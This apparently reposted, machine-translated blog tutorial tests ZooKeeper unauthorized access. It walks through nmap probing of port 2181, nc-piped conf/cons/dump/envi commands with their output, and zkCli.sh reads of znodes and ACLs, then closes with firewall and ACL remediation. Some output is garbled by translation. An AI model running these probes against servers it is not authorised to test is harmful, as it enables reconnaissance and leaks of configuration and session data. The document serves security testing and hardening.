Shulou(Shulou.com)06/02 Report--

Preface

ZooKeeper is a distributed, open source distributed application coordination service, an open source implementation of Google's Chubby, and an important component of Hadoop and Hbase. It is a software that provides consistency services for distributed applications, including configuration maintenance, domain name services, distributed synchronization, group services and so on.

Unauthorized access to zookeeper means that no authentication is required by default after installation and deployment, resulting in remote exploitation of zookeeper and disclosure of a large number of service level information.

Ports are used by default: 2181, 2182.

Probe Zookeeper service opening

If you use nmap to detect whether a destination address is running Zookeeper service, probe port 2181 is open.

Root@kali:~# nmap-Pn-p 2181 xx.xx.xx.xxStarting Nmap 7.80 (https://nmap.org) at 2019-10-21 01:56 EDTNmap scan report for xx.xx.xx.xx.static.sz.js.chinamobile.com (xx.xx.xx.xx) Host is up (0.016s latency) .PORT STATE SERVICE2181/tcp open eforwardNmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Batch probe only needs to modify the corresponding destination address.

Get information

Conf command

Output relevant service configuration details, port, data path, log path, session timeout, maximum number of connections, etc.

Root@kali:~# echo conf | nc xx.xx.xx.xx 2181clientPort=2171dataDir=/opt/data/zookeeper/data/version-2dataLogDir=/opt/data/zookeeper/data/version-2tickTime=2000maxClientCnxns=0minSessionTimeout=4000maxSessionTimeout=40000serverId=0

Cons command

Lists the details of all clients / sessions connected to the current server.

Root@kali:~# echo cons | nc xx.xx.xx.xx 2181 | more/10.23.46.40:11958 [1] (queued=0,recved=27317,sent=27317,sid=0x1000000e029b16e,lop=PING,est=1571277639586,to=40000,lcxid=0x33,lzxid=0x286a720,lresp=2435779043,llat=0,minlat=0,avglat=0,maxlat=397) / 10.23.46.39 more/10.23.46.40:11958 9688 [1] (queued=0,recved=27316,sent=27316,sid=0x1000000e029b17c,lop=PING,est=1571277641790,to=40000,lcxid=0x33,lzxid=0x286a71c,lresp=2435777895,llat=0,minlat=0,avglat=0,maxlat=560)

Dump command

Output outstanding sessions and temporary nodes, leader nodes are valid.

Root@kali:~# echo dump | nc xx.xx.xx.xx 2181 | moreSessionTracker dump:Session Sets (21): 0 expire at Thu Jan 29 12:38:08 CST 1970 expire at Thu Jan 0 expire at Thu Jan 29 12:38:10 CST 1970 moreSessionTracker dump:Session Sets 3 expire at Thu Jan 29 12:38:12 CST 1970:0x1000000e01f00130x1000000e029fdde0x1000000e029fe052 expire at Thu Jan 29 12:38:14 CST 1970:0x1000000e02a42350x1000000e01f00e931 expire at Thu Jan 29 12:38:16 CST 1970 Vera 0x1000000e01f067a0x1000000e02a423c0x1000000e01f00080x1000000e029fdf4.

Non-leader nodes do not see any relevant information.

Envi command

Output the details of the server.

Root@kali:~# echo envi | nc xx.xx.xx.xx 2181Environment:zookeeper.version=3.4.13-2d71af4dbe22557fda74f9a9b4309b15a7487f03 GMThost.name=c1b69852-ac24-11e8-88d9-a4bf01306d06java.version=1.7.0_80java.vendor=Oracle Corporationjava.home=/usr/java/jdk1.7.0_80/jrejava.class.path=/opt/midware/zookeeper/bin/../build/classes:/opt/midware/zookeeper/bin/../build/lib/*.jar:/opt/midware/zookeeper/bin/../lib/slf4j-log4j12-1.7.25.jar:/opt/midware/zookeeper at 04:05 on built on 8. / bin/../lib/slf4j-api-1.7.25.jar:/opt/midware/zookeeper/bin/../lib/netty-3.10.6.Final.jar:/opt/midware/zookeeper/bin/../lib/log4j-1.2.17.jar:/opt/midware/zookeeper/bin/../lib/jline-0.9.94.jar:/opt/midware/zookeeper/bin/../lib/audience-annotations-0.5.0.jar: / opt/midware/zookeeper/bin/../zookeeper-3.4.13.jar:/opt/midware/zookeeper/bin/../src/java/lib/*.jar:/opt/midware/zookeeper/bin/../conf:java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/libjava.io.tmpdir=/tmpjava.compiler=os.name=Linuxos.arch=amd64os.version=3.10.0-327.36.3.el7.x86_64user.name=rootuser.home=/rootuser.dir=/ connection test

Installation tool

For example, under kali, you can install the zookeeper tool with the following command, and then use the client connection tool zkCli.sh.

# apt-get install zookeeper...#root@kali:~# cd / usr/share/zookeeper/bin/#root@kali:/usr/share/zookeeper/bin# lszkCleanup.sh zkCli.sh zkEnv.sh zkServer.sh connection target

Use the-server parameter to specify the destination to connect.

Root@kali:/usr/share/zookeeper/bin#. / zkCli.sh-server xx.xx.xx.xx:2181Connecting to xx.xx.xx.xx:2181Welcome to ZooKeePerforming JLine support is enabled [zk: xx.xx.xx.xx:2181 (CONNECTING) 0]

... Connected

Get system-related information

Root@kali:/usr/share/zookeeper/bin#. / zkCli.sh-server xx.xx.xx.xx:2181Connecting to xx.xx.xx.xx:2181Welcome to ZooKeepervious JLine support is enabled [zk: xx.xx.xx.xx:2181 (CONNECTING) 0] WATCHER::WatchedEvent state:SyncConnected type:None path:null [zk: xx.xx.xx.xx:2181 (CONNECTED) 0] ls / [service, pms, DsMaster, Resource, monitor_lock Zookeeper] [zk: xx.xx.xx.xx:2181 (CONNECTED) 1] get / cZxid = 0x0ctime = Wed Dec 31 19:00:00 EST 1969mZxid = 0x0mtime = Wed Dec 31 19:00:00 EST 1969pZxid = 4dataVersion = 0aclVersion = 0ephemeralOwner = 0x0dataLength = 0numChildren = 6 [zk: xx.xx.xx.xx:2181 (CONNECTED) 2] get / servicecZxid = 0x2ctime = Thu Aug 30 02:58:40 EDT 2018mZxid = 0x2mtime = Thu Aug 30 02:58:40 EDT 2018pZxid = 0x1cb884dcversion = 7dataVersion = 0aclVersion = 0ephemeralOwner = 0x0dataLength = 0numChildren = 3 [zk: xx.xx.xx.xx:2181 (CONNECTED) 3] getAcl / 'world 'anyone: cdrwa repair scheme

1. Set firewall policy to restrict IP access [this scheme is recommended]

2. Do not expose zookeeper to the public network.

3. Set up user authentication and ACL

Referenc

Zookeeper does not authorize access

Http://vic.pub/zookeeper- does not authorize access /

Summary

The above is the Zookeeper unauthorized access test problem introduced to you by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply you in time. Thank you very much for your support to the website!

If you think this article is helpful to you, you are welcome to reprint it, please indicate the source, thank you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.